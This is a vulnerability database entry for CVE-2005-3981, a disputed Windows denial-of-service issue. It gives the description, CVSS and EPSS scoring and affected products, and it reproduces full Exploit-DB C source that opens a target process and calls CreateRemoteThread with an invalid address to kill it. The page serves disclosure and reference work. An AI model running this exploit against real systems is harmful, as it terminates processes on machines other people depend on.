CVE-2005-3981 : Detail

CVE-2005-3981

0.09%V3
Local
2005-12-04
10h00 +00:00
2018-10-19
12h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

NOTE: this issue has been disputed by third parties. Microsoft Windows XP, 2000, and 2003 allows local users to kill a writable process by using the CreateRemoteThread function with certain arguments on a process that has been opened using the OpenProcess function, possibly involving an invalid address for the start routine. NOTE: followup posts have disputed this issue, saying that if a user already has privileges to write to a process, then other functions could be called or the process could be terminated using PROCESS_TERMINATE

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 26690

Publication date : 2005-11-30 23h00 +00:00
Author : Nima Salehi
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/15671/info Microsoft Windows is prone to a local denial of service vulnerability. This issue can allow an attacker to trigger a system wide denial of service condition or terminate arbitrary processes. Reports indicate that a process can call the 'CreateRemoteThread' function to trigger this issue. It was reported that this attack can be carried out by a local unprivileged user. #include <windows.h> #include <tlhelp32.h> #include <stdio.h> BOOL exploit(char* chProcessName) { HANDLE hProcessSnap = NULL; HANDLE hProcess = NULL; BOOL bFound = FALSE; BOOL bRet = FALSE; PROCESSENTRY32 pe32 = {0}; UINT uExitCode = 0; DWORD dwExitCode = 0; LPDWORD lpExitCode = &dwExitCode; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hProcessSnap == INVALID_HANDLE_VALUE) return (FALSE); pe32.dwSize = sizeof(PROCESSENTRY32); printf("\n[+] Search For Process ... \n"); while(!bFound && Process32Next(hProcessSnap, &pe32)) { if(lstrcmpi(pe32.szExeFile, chProcessName) == 0) bFound = TRUE; } CloseHandle(hProcessSnap); if(!bFound){ SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED| FOREGROUND_INTENSITY) ; printf("[-] Sorry Process Not Find \n"); return(FALSE); } printf("[+] Process Find \n"); hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID); if(hProcess == NULL){ SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED| FOREGROUND_INTENSITY) ; printf("[-] Sorry Write Access Denied for This Process \n"); printf("[-] Exploit Failed :( \n"); return(FALSE); } printf("[+] Write Access Is allowed \n"); printf("[+] Send Exploit To Process ...\n"); CreateRemoteThread(hProcess,0,0,(DWORD (__stdcall *)(void *))100,0,0,0); printf("[+] Successful :)\n"); return(pe32.th32ProcessID); } int main(int argc,char **argv) { char* chProcess = argv[1]; COORD coordScreen = { 0, 0 }; DWORD cCharsWritten; CONSOLE_SCREEN_BUFFER_INFO csbi; DWORD dwConSize; HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE); GetConsoleScreenBufferInfo(hConsole, &csbi); dwConSize = csbi.dwSize.X * csbi.dwSize.Y; FillConsoleOutputCharacter(hConsole, TEXT(' '), dwConSize, coordScreen, &cCharsWritten); GetConsoleScreenBufferInfo(hConsole, &csbi); FillConsoleOutputAttribute(hConsole, csbi.wAttributes, dwConSize, coordScreen, &cCharsWritten); SetConsoleCursorPosition(hConsole, coordScreen); SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_GREEN| FOREGROUND_INTENSITY) ; if(argc < 2) { printf("\n"); printf(" ========================================================================== \n"); printf(" > Microsoft Windows CreateRemoteThread Exploit < \n"); printf(" > BUG Find By Q7X ( Nima Salehi ) [email protected] < \n"); printf(" > Exploited By Q7X ( Nima Salehi ) [email protected] < \n"); SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED | FOREGROUND_INTENSITY|FOREGROUND_GREEN|FOREGROUND_BLUE); printf(" > Compile : cl -o nima.c ( Win32/VC++ ) < \n"); printf(" > Usage : nima.exe Process < \n"); printf(" > Example : nima.exe explorer.exe < \n"); printf(" > Tested on : Windows XP (SP0 ,SP1 ,SP2) , Windows 2000 AdvServer (SP4) < \n"); printf(" > Windows 2000 Server (SP4), Windows 2003 (SP0 , SP1) < \n"); SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED| FOREGROUND_INTENSITY) ; printf(" > Copyright 2002-2005 By Ashiyane Digital Network Security Team < \n"); printf(" > www.Ashiyane.com ( Free ) www.Ashiyane.net ( Not Free ) < \n"); printf(" > Special Tanx To My Best Friend Behrooz_Ice < \n"); printf(" ========================================================================== \n"); } else exploit(chProcess); SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED |FOREGROUND_GREEN|FOREGROUND_BLUE); }

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2003_server >> Version enterprise

    Microsoft>>Windows_2003_server >> Version enterprise

      Microsoft>>Windows_2003_server >> Version r2

        Microsoft>>Windows_2003_server >> Version r2

          Microsoft>>Windows_2003_server >> Version standard

            Microsoft>>Windows_2003_server >> Version standard

              Microsoft>>Windows_2003_server >> Version web

                Microsoft>>Windows_2003_server >> Version web

                  Microsoft>>Windows_xp >> Version *

                  Microsoft>>Windows_xp >> Version *

                  Microsoft>>Windows_xp >> Version *

                  Microsoft>>Windows_xp >> Version *

                  Microsoft>>Windows_xp >> Version *

                  Microsoft>>Windows_xp >> Version *

                  Microsoft>>Windows_xp >> Version *

                  Microsoft>>Windows_xp >> Version *

                  References

                  http://www.securityfocus.com/bid/15671/
                  Tags : vdb-entry, x_refsource_BID